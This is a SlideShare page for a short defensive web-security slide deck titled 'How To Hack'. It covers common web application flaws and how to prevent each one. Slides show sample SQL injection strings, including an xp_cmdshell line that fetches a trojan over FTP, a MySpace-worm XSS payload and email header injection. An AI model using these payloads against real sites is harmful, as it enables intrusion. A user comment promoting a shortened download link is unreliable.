How To Hack

4,004 views

Published on

Or how not to get hacked! The common ways that web applications can be attacked and what you need to do to prevent it.

Published in: Technology, Business
2 Comments
11 Likes
Statistics
Notes
  • This is a old version. download free latest version from here. this is better for this: http://bit.ly/12rUOWq

    no survay no password
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • my slide i like
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
4,004
On SlideShare
0
From Embeds
0
Number of Embeds
52
Actions
Shares
0
Downloads
0
Comments
2
Likes
11
Embeds 0
No embeds

No notes for slide

How To Hack

  1. 1. Thom Shannon – Glow New Media
  2. 2. 7 SINS OF A COMPLACENT WEB DEVELOPER <ul><li>SQL Injection </li></ul><ul><li>JavaScript Injection </li></ul><ul><li>Cookie Injection </li></ul><ul><li>Email Injection </li></ul><ul><li>File Uploads </li></ul><ul><li>Cross domain form submission </li></ul><ul><li>Cross domain JSON APIs </li></ul>
  3. 4. <ul><li>SELECT * FROM [User] WHERE </li></ul><ul><li>[Name] = ‘ admin ’ </li></ul><ul><li>AND </li></ul><ul><li>[Password] = ‘ secret ’ </li></ul>
  4. 5. <ul><li>SELECT * FROM [User] WHERE </li></ul><ul><li>[Name] = ‘ admin ’ </li></ul><ul><li>AND </li></ul><ul><li>[Password] = ‘ ’ or true; -- ’ </li></ul>
  5. 7. <ul><li>SELECT * FROM [Page] WHERE </li></ul><ul><li>[Title] = ‘ Home’; exec xp_cmdshell(‘ftp host trojan.exe’)’ -- ’ </li></ul>
  6. 8. <ul><li>Validate ALL possible inputs </li></ul><ul><li>Escape Quotes! </li></ul><ul><li>Use strongly typed/parameter queries </li></ul><ul><li>Can affect many platforms </li></ul><ul><ul><li>ASP </li></ul></ul><ul><ul><li>.Net </li></ul></ul><ul><ul><li>PHP </li></ul></ul><ul><ul><li>... </li></ul></ul>
  7. 10. MYSPACE WORM <ul><li><div id=&quot;mycode&quot; expr=&quot;alert(‘pwnd!’)&quot; style=&quot;background:url('java script:eval(document.all.mycode.expr)')&quot;> </li></ul>
  8. 13. DEFAULT DENY <ul><li>Strip all HTML </li></ul><ul><li>Use a simple markup like Textile </li></ul><ul><li>Validate ALL inputs </li></ul>
  9. 15. BAD COOKIES <ul><li>loggedon=false </li></ul><ul><li>Userid=78 </li></ul><ul><li>permissionlevel=1 </li></ul>
  10. 16. <ul><li>Store important data on server </li></ul><ul><li>Use a token </li></ul><ul><li>Do not trust anything sent from the client </li></ul>
  11. 18. <ul><li>Used by Spammers </li></ul><ul><li>From: [email_address] </li></ul><ul><li>Cc:spamee@gmail.com, poorsap@hotmail.com </li></ul><ul><li>Subject: Buy [Drugs|Viagra|Stocks] </li></ul>
  12. 19. <ul><li>Validate email addresses and other content </li></ul><ul><li>Don’t put user input in mail headers </li></ul>
  13. 21. <ul><li>/uploads/runSpamEngine.php </li></ul><ul><li>/uploads/downloadDb.aspx </li></ul><ul><li>/uploads/crashBox.exe </li></ul>
  14. 22. <ul><li>SysAdmin can remove execution permissions </li></ul><ul><li>Web Developer can validate too </li></ul><ul><li>Always use DEFAULT DENY (whitelist) </li></ul>
  15. 24. <ul><li>Post from attackers site to logged in site </li></ul><ul><li>Action purchases </li></ul><ul><li>Change profile page </li></ul><ul><li>Use hidden frame to keep posting </li></ul>
  16. 26. <ul><li>Pass a token with the form </li></ul><ul><li>Confirm destructive actions </li></ul><ul><li>307 redirect in Internet Explorer </li></ul>
  17. 28. <ul><li>AJAX friendly APIs </li></ul><ul><li>JavaScript blog widgets </li></ul><ul><li>Called using SCRIPT elements </li></ul><ul><li>Can cause actions or reveal private data </li></ul>
  18. 29. <ul><li>Client side code is always insecure </li></ul><ul><li>Authenticate with query string </li></ul><ul><li>Track using API application key </li></ul>
  19. 30. In Summary <ul><li>Don’t pass the buck, take responsibility </li></ul><ul><li>Web app exploits are the most common </li></ul><ul><li>Everyone is a target </li></ul>
  20. 31. <ul><li>Thom Shannon </li></ul><ul><li>www.ts 0 .com </li></ul>

×